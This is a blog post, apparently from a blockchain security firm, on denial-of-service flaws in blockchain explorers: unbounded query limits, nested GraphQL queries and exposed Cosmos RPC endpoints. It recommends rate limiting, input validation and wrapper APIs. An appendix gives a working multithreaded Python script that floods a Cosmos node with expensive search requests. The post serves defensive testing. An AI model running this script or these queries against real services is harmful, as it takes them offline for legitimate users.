Technology

Is Your Blockchain Explorer Safe from Denial-of-Service (DoS) Attacks?

7/28/2020

Is Your Blockchain Explorer Safe from Denial-of-Service (DoS) Attacks?

Introduction

Blockchain explorers are blockchain search engines that allow you to search for a particular piece of information on the blockchain. For example, Etherscan (https://etherscan.io/) is a blockchain explorer for Ethereum, providing users easy access to information about blocks, addresses, transactions, and other activities on the Ethereum blockchain.

The attack surface for a blockchain explorer application is relatively small. As it doesn’t involve authentication or authorization, there is no private information to leak. Additionally, the widespread use of web frameworks such as Vue and React make it less likely for XSS (Cross-Site Scripting) to occur.

Most of the features in explorers involve searching data from a backend database or querying data from blockchain nodes directly, and when considering vulnerabilities in search queries, two come to mind: SQL injection and DoS (Denial-of-Service). When looking at different explorers, we’ve only found one case of SQL injection; on the other hand, more than half of blockchain explorers are vulnerable to DoS attacks.

Denial of Service (DoS) is an attack that prevents the system from providing services to legitimate users. Application-layer DoS attack take advantage of the fact that HTTP requests are cheap for clients to send and may be expensive for the server to process and respond. Generally speaking, DoS attack and defense is an arms race, the outcome depending on which side has more resources. However, it’s possible to bring down an application with just one request if the backend is poorly implemented.

In this article, we’ll discuss some of the things that developers forget to pay attention to that could make the application vulnerable to a DoS attack, the impact of a DoS attack, and recommendations on how to protect the application.

Examples of DoS Attacks

There are many ways to DoS a server, but in general the goal is to consume either all CPU & memory resources or occupy all connection slots. We present some unique cases that make servers vulnerable to DoS attacks—some caused by software implementation errors and others by misconfiguration:

1. Resource access API without limitation

https://fake.sample.com/api/v1/blocks?limit=10

The request above fetches block information with the block amount indicated in the “limit” parameter. When the limit is set to 10, it returns block information for the last 10 blocks. The request works perfectly when the number is small. However, we found that the backend might not have an upper bound for the “limit” parameter. When we send the request with the “limit” parameter set to 9999999, the request hangs for a long time and returns a “504 gateway time-out” error. At the same time, we discovered the response time for other APIs significantly increased.

9999999 also exceeds the total number of blocks in the chain. What we imagine is the backend attempts to fetch data for every block in the blockchain. The server would crash or at least become unresponsive if an attacker sent multiple fetching requests with a very large block “limit”.

2. Nested graphQL query

We encountered a few blockchain explorers using GraphQL, which is a query language for APIs. With GraphQL, the client is able to make a single call to fetch the required information rather than construct several REST requests to fetch the same amount of info. GraphQL is an amazing technology that is starting to be adopted by many companies, but it can cause security issues if not used correctly.

When looking at explorers, we found that one GraphQL API has a circular relationship between two types, allowing the user to construct a nested query with multiple levels. Sending a nested query with multiple levels can result in high CPU usage on the server. With only a few requests, the CPU usage can rise up to more than 100%, rendering the server unresponsive to normal user requests.

% CPU when the server processing a Nested GraphQL query

The below “dos_query” demonstrates what a nested query looks like.

Nested GraphQL Query

Depending on the complexity of the query and the total CPU power of the server, the server might be able to survive through the nested query. But it may also completely crash because of the excessive CPU usage.

Check out this article for more information on handling malicious GraphQL queries.

3. Exposed Cosmos RPC APIs

https://fake.cosmos.api.com/txs?message.action=send&limit=100&tx.minheight=1

The Cosmos API above searches for 100 transactions with the “send” action starting from block 1. Note that by the time of writing, there are 2712445 blocks in Cosmos mainnet. For a fully synchronized node that exposes the RPC API in Cosmos Hub, we weren’t able to find any node that could handle this request. The server would return a “502 Bad Gateway” error after a while, indicating the requests failed.

The node RPC server would return the following error for all APIs once it receives a couple hundred search requests in the span of a few seconds. Some nodes can recover from the error automatically, while others would need a reboot.

For us to better understand the issue and demonstrate the effect, we set up a fully synchronized Cosmos full node and attack the node with the query we mentioned above “https://fake.cosmos.api.com/txs?message.action=send&limit=100&tx.minheight=1”.

Here is the CPU usage percentage panel, generated in Grafana:

Grafana CPU% panel

The graph can be broken down into 3 stages:

The node is up and running, the system is on 35% CPU usage.
The node is facing a DoS attack, the system is on 97% CPU usage.
The node crashes and is unable to feed new data to Grafana.

The graph shows the server crashing in just a few minutes under the DoS attack. We had to reboot the server since we weren’t even able to use SSH to connect to the server after it crashed.

4. Defective request handler

https://fake.sample.com/api/v1?feature=Always_time_out

We encountered one API that hangs and then times out after a while; however, sending multiple requests to the server didn’t slow down the response time for other APIs. Our guess is that the handler for that particular API is not CPU or memory intensive. Because the explorer is not open source, we couldn’t get the information on the code implementation for the API. We’re also unable to determine the purpose of that API endpoint based on its name.

Although attacking the API is unlikely to crash the server, an attacker can stop other users from accessing the server APIs by sending the “Always hang and time out” request to occupy all network connections.

To give an example, the “sleep_to_handle_request” function demonstrates the idea that one request could consume very little CPU and memory, but will hang for a long time and occupy the connection slot.

def sleep_to_handle_request():
    sleep(10000)

Compared to the other three examples where the server would crash completely or take a long time to recover, in this example, the server recovered right after the attack stopped.

Impact of DoS Attacks

When encountering a DoS attack, vulnerable servers will fail to respond to normal user requests. Some servers can recover to normal state either right after or some time after the attack stops, while others would crash completely and need a reboot.

It would be a headache for any blockchain if an explorer became unavailable to its users, since they would no longer be able to easily obtain information about on-chain activities. Moreover, on Cosmos-based chains, if a node suffers from DoS attack, not only is the connected explorer unable to fetch data from the node, the user would also be unable to use the API to perform actions such as sending tokens or delegating tokens to validators.

Recommendations

Denial of Service attacks are always a threat to applications, and there isn’t a single perfect solution out there to mitigate them. However, there are methods that can be employed to increase the cost of attacks (thereby making it harder for would-be attackers to execute) and decrease the risk of vulnerabilities in explorer applications. Here we list a few things that can be done to minimize the chance of applications falling victim to attackers:

1. Rate limiting

First thing’s first: APIs should always have rate limiting in place to temporally timeout and permanently block malicious IPs. Even if the backend APIs are perfectly implemented, an attacker can cause damage by flooding the server with volumetric requests.

Rate limiting wouldn’t solve the problem completely, but it’s easy to implement and creates the first layer of defense to a denial of service attack.

2. Improve design and implementation

An optimized design and implementation will give a better performance under the same hardware, especially for functions related to database searching and data processing. But before considering performance, the code needs to be bug-free.

It’s worth spending time on writing unit-tests for each API to ensure they work as intended before deploying to the production environment. If the backend server can’t properly handle a normal request, expect that the application will eventually run into trouble.

3. Input validation and parameter restrictions

Once you’re sure the code works as intended, then you’ll also want to ensure the attacker wouldn’t be able to abuse the API with an unexpected input. Fetching data for 9999999 blocks or handling a 1000-level nested GraphQL query is not the kind of request the server should process.

Without input validation and restrictions, attackers are free to abuse APIs. All user input should be considered untrusted and potentially malicious; servers should validate user input before processing them.

For the examples we demonstrated above, GraphQL APIs can set a maximum query depth to effectively defend against DoS attacks with nested queries, and the block data fetching API can restrict the maximum number of blocks to a reasonable number, such as 50.

Developers can examine their code & design and come up with the most appropriate way to perform the input validation and restrictions.

4. Don’t expose the node RPC

Not all implementations of APIs are under a developer’s control. For example, developers shouldn’t modify code for the Cosmos RPC APIs; it’s a known issue that the performance for certain searching queries in Cosmos SDK are not very good, so what can we do here?

One of the solutions is to create a wrapper API around the Cosmos RPC API and a database that stores blockchain data, which synchronizes from the node, to serve search queries. The wrapper API is exposed to the public to receive and process user requests, before passing the request to the Cosmos RPC or search data in the backend database. The wrapper API effectively prevents users from interacting with the node RPC APIs directly. With the database, it prevents the node from being overwhelmed with search queries, and developers can optimize the database whatever way they want.

On the Cosmos forum, user “kwunyeung” suggests another solution: use an HTTP proxy such as Nginx or Caddy to protect the RPC port. The idea is the same—don’t expose the RPC directly to the public, and put certain protections in place.

5. Meet the recommended hardware requirements

Even if all aforementioned defense mechanisms are deployed, do note that there is a minimum hardware requirement to run an API server or a stable node (Tendermint for example). If the server has a hard time processing requests from regular users visiting the website, then you should probably upgrade your hardware.

In Summary

The last thing that users want is a service interruption, and DoS attacks may put applications like explorers at risk.

If you’re looking to conduct a thorough review on the security posture of your blockchain ecosystem—including the explorer, wallet, exchange, smart contract, or even the implementation of your underlying blockchain protocol—CertiK can help.

Our team has a wide range of blockchain experience and expertise in application vulnerability assessment, as well as code review for different languages like Solidity, RUST, and Go, and on platforms like Ethereum, Cosmos, and Substrate.

Appendix

Denial of Service testing script.

This is a sample script to test if the Cosmos nodes are vulnerable to the denial-of-service attack. Modify the “url” variable accordingly to test different applications.

Please do not run against applications that you don’t have the permission to do so.

import requests 
import threading
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)  

#Modify the url
url ="https://fake.cosmos.api/txs?message.action=send&limit=100&tx.minheight=1"  

def dos_thread():
    while(1):
        response = requests.request("GET", url, verify=False)
        print(response.text.encode('utf8'))  

if __name__ == "__main__":
    for i in range(300):
        t = threading.Thread(target=dos_thread)
        t.start()